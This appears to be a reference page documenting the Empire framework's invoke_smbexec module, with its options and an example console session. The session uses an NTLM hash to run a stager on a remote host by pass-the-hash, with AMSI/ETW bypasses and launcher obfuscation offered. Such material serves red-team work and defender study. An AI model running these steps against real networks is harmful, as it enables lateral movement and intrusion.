Invoke-SMBExec - Empire Module
This page contains detailed information about how to use the powershell/lateral_movement/invoke_smbexec Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-SMBExec
Module: powershell/lateral_movement/invoke_smbexec
Source code [1]: empire/server/modules/powershell/lateral_movement/invoke_smbexec.yaml
Source code [2]: empire/server/modules/powershell/lateral_movement/invoke_smbexec.py
MITRE ATT&CK:
T1187, T1135, T1047
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No
The invoke_smbexec module executes a stager on remote hosts using SMBExec.ps1. This module requires a username and NTLM hash.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the invoke_smbexec module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the invoke_smbexec module:
Agent
Agent to run module on.
ComputerName
Host[s] to execute the stager on, comma separated.
Domain
Domain.
Hash
NTLM Hash in LM:NTLM or NTLM format.
Username
Username.
Additional Module Options
This is a list of additional options that are supported by the invoke_smbexec module:
Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw
.
Command
Custom command to run.
CredID
CredID from the store to use.
Listener
Listener to use.
Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False
.
ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1
.
OutputFunction
PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
Default value: Out-String
.
Suggested values: Out-String
, ConvertTo-Json
, ConvertTo-Csv
, ConvertTo-Html
, ConvertTo-Xml
.
Proxy
Proxy to use for request (default, none, or other).
Default value: default
.
ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default
.
Service
Name of service to create and delete. Defaults to 20 char random.
UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default
.
Invoke_smbexec Example Usage
Here's an example of how to use the invoke_smbexec module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/lateral_movement/invoke_smbexec
Author @rvrsh3ll
Background False
Comments https://raw.githubusercontent.com/Kevin-Robertson/Invoke-
TheHash/master/Invoke-SMBExec.ps1
Description Executes a stager on remote hosts using SMBExec.ps1. This module
requires a username and NTLM hash
Language powershell
Name powershell/lateral_movement/invoke_smbexec
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1187
http://attack.mitre.org/techniques/T1135
http://attack.mitre.org/techniques/T1047
,Record Options----,--------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------------|--------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|------------------|--------------------|----------|-------------------------------------|
| Bypasses | mattifestation etw | False | Bypasses as a space separated list |
| | | | to be prepended to the launcher. |
|------------------|--------------------|----------|-------------------------------------|
| Command | | False | Custom command to run. |
|------------------|--------------------|----------|-------------------------------------|
| ComputerName | | True | Host[s] to execute the stager on, |
| | | | comma separated. |
|------------------|--------------------|----------|-------------------------------------|
| CredID | | False | CredID from the store to use. |
|------------------|--------------------|----------|-------------------------------------|
| Domain | . | True | Domain. |
|------------------|--------------------|----------|-------------------------------------|
| Hash | | True | NTLM Hash in LM:NTLM or NTLM |
| | | | format. |
|------------------|--------------------|----------|-------------------------------------|
| Listener | | False | Listener to use. |
|------------------|--------------------|----------|-------------------------------------|
| Obfuscate | False | False | Switch. Obfuscate the launcher |
| | | | powershell code, uses the |
| | | | ObfuscateCommand for obfuscation |
| | | | types. For powershell only. |
|------------------|--------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1 | False | The Invoke-Obfuscation command to |
| | | | use. Only used if Obfuscate switch |
| | | | is True. For powershell only. |
|------------------|--------------------|----------|-------------------------------------|
| OutputFunction | Out-String | False | PowerShell's output function to use |
| | | | ("Out-String", "ConvertTo-Json", |
| | | | "ConvertTo-Csv", "ConvertTo-Html", |
| | | | "ConvertTo-Xml"). |
|------------------|--------------------|----------|-------------------------------------|
| Proxy | default | False | Proxy to use for request (default, |
| | | | none, or other). |
|------------------|--------------------|----------|-------------------------------------|
| ProxyCreds | default | False | Proxy credentials |
| | | | ([domain\]username:password) to use |
| | | | for request (default, none, or |
| | | | other). |
|------------------|--------------------|----------|-------------------------------------|
| Service | | False | Name of service to create and |
| | | | delete. Defaults to 20 char random. |
|------------------|--------------------|----------|-------------------------------------|
| UserAgent | default | False | User-agent string to use for the |
| | | | staging request (default, none, or |
| | | | other). |
|------------------|--------------------|----------|-------------------------------------|
| Username | | True | Username. |
'------------------'--------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set ComputerName dbserver-01
[*] Set ComputerName to dbserver-01
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set Domain local.corp
[*] Set Domain to local.corp
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set Hash 5fbc3d5fec8206a30f4b6c473d68ae76
[*] Set Hash to 5fbc3d5fec8206a30f4b6c473d68ae76
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set Username user
[*] Set Username to user
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/lateral_movement/invoke_smbexec.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/lateral_movement/invoke_smbexec.py
- https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-SMBExec.ps1
- http://attack.mitre.org/techniques/T1187
- http://attack.mitre.org/techniques/T1135
- http://attack.mitre.org/techniques/T1047
See Also
Check also the following modules related to this module:
- powershell/lateral_movement/invoke_psexec
- powershell/lateral_movement/invoke_sqloscmd
- powershell/lateral_movement/invoke_psremoting
- powershell/lateral_movement/invoke_executemsbuild
- powershell/lateral_movement/invoke_dcom
- powershell/lateral_movement/invoke_portfwd
- powershell/lateral_movement/invoke_wmi
- powershell/lateral_movement/invoke_wmi_debugger
- powershell/lateral_movement/invoke_sshcommand
- powershell/code_execution/invoke_metasploitpayload
- powershell/code_execution/invoke_ntsd
- powershell/code_execution/invoke_shellcodemsil
- powershell/code_execution/invoke_assembly
- powershell/code_execution/invoke_reflectivepeinjection
- powershell/code_execution/invoke_ironpython
- powershell/code_execution/invoke_clearscript
- powershell/code_execution/invoke_dllinjection
- powershell/code_execution/invoke_ironpython3
- powershell/code_execution/invoke_shellcode
- powershell/code_execution/invoke_ssharp
- powershell/code_execution/invoke_boolang
- powershell/exploitation/invoke_spoolsample
- powershell/credentials/invoke_kerberoast
- powershell/credentials/invoke_internal_monologue
- powershell/credentials/invoke_ntlmextract
- powershell/management/invoke_script
- powershell/management/invoke_sharpchisel
- powershell/management/invoke_socksproxy
- powershell/lateral_movement/jenkins_script_console
- powershell/lateral_movement/new_gpo_immediate_task
- powershell/lateral_movement/inveigh_relay
- python/lateral_movement/multi/ssh_launcher
- python/lateral_movement/multi/ssh_command
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.